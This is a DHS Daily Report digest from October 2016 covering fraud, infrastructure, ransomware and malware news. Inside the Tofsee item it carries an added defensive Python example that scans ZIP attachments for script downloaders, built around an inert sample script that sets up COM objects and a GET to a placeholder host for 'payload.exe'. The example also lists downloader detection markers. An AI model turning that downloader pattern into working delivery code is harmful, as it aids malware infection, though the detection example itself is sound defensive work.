Monday, October 03, 2016



Complete DHS Report for October 03, 2016

Daily Report

Top Stories

• Och-Ziff Capital Management Group agreed to pay $200 million September 29 to settle charges that the firm’s executives used intermediaries and business partners to pay bribes to high-level government officials in Africa in order to secure mining rights. – U.S. Securities and Exchange Commission See item 4 below in the Financial Services Sector

• The Baltimore City Department of Public Works reported September 29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones Falls following severe rainstorms in the area that began September 28. – WBFF 45 Baltimore

18. September 29, WBFF 45 Baltimore – (Maryland) At least 10,000 gallons of sewage, rainwater released into Jones Falls: DPW. The Baltimore City Department of Public Works reported September 29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones Falls following severe rainstorms in the area that began September 28. City officials advised the public to avoid contact with urban streams. Source: http://foxbaltimore.com/news/local/at-least-10000-gallons-of-sewer-water-released-into-jones-falls-dpw

• The Texas Water Development Board awarded a $5.4 million loan to the City of Edinburg, Texas September 22 to complete the expansion of the city’s West Water Treatment Plant. – Edinburg Review

19. September 29, Edinburg Review – (Texas) Edinburg awarded $5.4 million to finish water treatment plant upgrade. The Texas Water Development Board awarded a $5.4 million loan to the City of Edinburg, Texas September 22 through the agency’s Drinking Water State Revolving Fund to complete the expansion of the city’s West Water Treatment Plant. The expansion includes adding 2 raw water pumps, 2 contact reactor clarifiers, and a 2 million gallon ground storage tank, among other improvements. Source: http://www.edinburgreview.com/news/20160929/edinburg-awarded-54-million-to-finish-water-treatment-plant-upgrade

• The Marin Healthcare District and Prima Medical Foundation announced September 28 that the medical data of more than 5,000 patients was lost due to a glitch in a vendor's system following a July ransomware attack. – Marin Independent Journal

20. September 30, Marin Independent Journal – (California) Marin patients’ medical data lost after cyber attack. The Marin Healthcare District and Prima Medical Foundation announced September 28 they are notifying more than 5,000 patients that their medical data, including limited clinical history, vital signs, and documentation of physical examinations, among other information, was lost due to a glitch in Marin Medical Practice Concepts’ system following a ransomware attack in July. Officials stated patients’ personal, financial, and health information was not accessed, viewed, or transferred. Source: http://www.marinij.com/article/NO/20160929/NEWS/160929766
Financial Services Sector

4. September 29, U.S. Securities and Exchange Commission – (International) Och-Ziff executives also settle charges. The U.S. Securities and Exchange Commission (SEC) announced September 29 that Och-Ziff Capital Management Group agreed to pay roughly $200 million to settle charges that the firm’s executives disregarded red flags and corruption risks under the Foreign Corrupt Practices Act (FCPA), and used intermediaries, agents, and business partners to pay bribes to high-level government officials in 5 African countries in order to secure mining rights and corruptly influence those officials. SEC officials stated that Och-Ziff fraudulently documented the bribe payments and failed to maintain the internal controls needed to recognize or prevent the bribes. Source: https://www.sec.gov/news/pressrelease/2016-203.html

5. September 29, SecurityWeek – (International) Dridex banking trojan adopts improved encryption. MalwareTech security researchers discovered that the Dridex banking trojan started delivering password-protected Rich Text Format (RTF) files, which keep automated systems from opening and scanning the attachment for malicious code. Researchers also found that Dridex employs delayed execution and may be focused on infecting corporate systems.

6. September 28, U.S. Department of Justice – (International) Dual Jamaican-U.S. citizen pleads guilty in connection with Jamaica-based lottery fraud scheme. A dual Jamaican and U.S. citizen pleaded guilty September 28 for her role in a Jamaica-based fraudulent lottery scheme in which she persuaded U.S. citizens to send her hundreds of thousands of dollars to cover fees for lottery winnings that did not exist; the scheme as a whole caused U.S. citizens tens of millions of dollars in losses from 2011 – 2012. The charges state the dual citizen used some of the funds for personal expenses. Source: https://www.justice.gov/opa/pr/dual-jamaican-us-citizen-pleads-guilty-connection-jamaica-based-lottery-fraud-scheme

Information Technology Sector

23. September 30, SecurityWeek – (International) Tofsee malware distribution switched from exploit kit to spam. Security researchers from Cisco Talos reported that attackers stopped distributing the Tofsee malware via the RIG exploit kit (EK) and began using spam email campaigns instead. The messages carry a ZIP archive that the victim is instructed to download and open; the archive contains an obfuscated JavaScript file acting as a WScript downloader, which fetches and runs an executable from a remote server controlled by the attacker. Researchers stated the malware allows attackers to conduct cryptocurrency mining, carry out distributed denial-of-service (DDoS) attacks, and send spam, among other malicious actions.
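The delivery chain in the Tofsee item (ZIP attachment wrapping a script that Windows Script Host will run) and the point in the Dridex item (a password-protected attachment that automated scanners cannot open) both lend themselves to a simple mail-gateway check. The following is an added example written for this page, not code from Cisco Talos, MalwareTech or SecurityWeek. It builds a constructed sample attachment in memory (a harmless script that only names the COM objects a WScript downloader uses), then inspects the archive for script-type members, double extensions that disguise a script as a document, encrypted members that cannot be scanned (the ZIP analogue of the password-protected RTF in the Dridex item), and a handful of downloader markers in the script text. The extension lists and marker strings are heuristics chosen for the example, not indicators published in the reports.

```python
import io
import zipfile

# Constructed sample attachment modelled on the spam chain described above.
# The script is inert: it only references COM objects, it does not run anything.
SAMPLE_SCRIPT = (
    'var a = "MSXML2.XML" + "HTTP";\n'           # split string defeats a naive XMLHTTP match
    'var h = new ActiveXObject(a);\n'
    'var s = new ActiveXObject("ADODB.Stream");\n'
    'var w = new ActiveXObject("WScript.Shell");\n'
    'h.open("GET", "http://example.invalid/payload.exe", false);\n'
)


def build_sample_zip() -> bytes:
    """Return a ZIP (constructed for this example) with a decoy-named script and a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_29092016.pdf.js", SAMPLE_SCRIPT)
        zf.writestr("readme.txt", "Please see attached invoice.\n")
    return buf.getvalue()


# File types that wscript.exe/cscript.exe (or mshta.exe for .hta) execute on double-click.
WSH_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta"}
# Document-looking extensions commonly placed before the real one ("Invoice.pdf.js").
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}
# COM objects and helpers a WSH downloader needs to fetch and run a payload (heuristic list).
DOWNLOADER_MARKERS = ["ActiveXObject", "XMLHTTP", "ADODB.Stream",
                      "WScript.Shell", ".Run(", "eval(", "unescape("]


def inspect_attachment(zip_bytes: bytes) -> dict[str, list[str]]:
    """Return {member name: [reasons]} for members that look like script downloaders."""
    findings: dict[str, list[str]] = {}
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return {"<archive>": ["not a valid ZIP archive"]}
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons: list[str] = []
            base = info.filename.rsplit("/", 1)[-1].lower()
            parts = base.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext in WSH_EXTENSIONS:
                reasons.append(f"Windows Script Host file type {ext}")
                if len(parts) > 2 and "." + parts[-2] in DECOY_EXTENSIONS:
                    reasons.append(f"double extension: disguised as .{parts[-2]}")
                # General-purpose bit 0 of the ZIP header marks an encrypted member;
                # reading it would raise, and no scanner can inspect its content.
                if info.flag_bits & 0x1:
                    reasons.append("encrypted member; content cannot be scanned")
                else:
                    text = zf.read(info).decode("latin-1")
                    hits = [m for m in DOWNLOADER_MARKERS if m in text]
                    if hits:
                        reasons.append("downloader markers: " + ", ".join(hits))
            if reasons:
                findings[info.filename] = reasons
    return findings


if __name__ == "__main__":
    for member, reasons in inspect_attachment(build_sample_zip()).items():
        print(member)
        for r in reasons:
            print("  -", r)
```

Note that the split string `"MSXML2.XML" + "HTTP"` in the sample is exactly the kind of obfuscation the Tofsee item mentions: the `XMLHTTP` marker does not match, but the remaining COM object names still do, and the file type and double extension alone are enough to quarantine the message regardless of the script's content. A gateway should treat an encrypted script member as unscannable rather than clean.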

For another story, see item 2 below from the Critical Manufacturing Sector

2. September 30, SecurityWeek – (International) Cisco forgets to remove testing interface from security appliance. Cisco inadvertently shipped a critical vulnerability in both its physical and virtual Email Security Appliances (ESA) running IronPort and AsyncOS software: an internal testing and debugging interface was left enabled, and a remote attacker able to connect to it without authentication could gain control of the affected device with root privileges. Cisco advised users to reboot their devices using the reboot command from the command-line interface in order to disable the internal testing and debugging interface. Source: http://www.securityweek.com/cisco-forgets-remove-testing-interface-security-appliance

Communications Sector

See item 2 above in the Information Technology Sector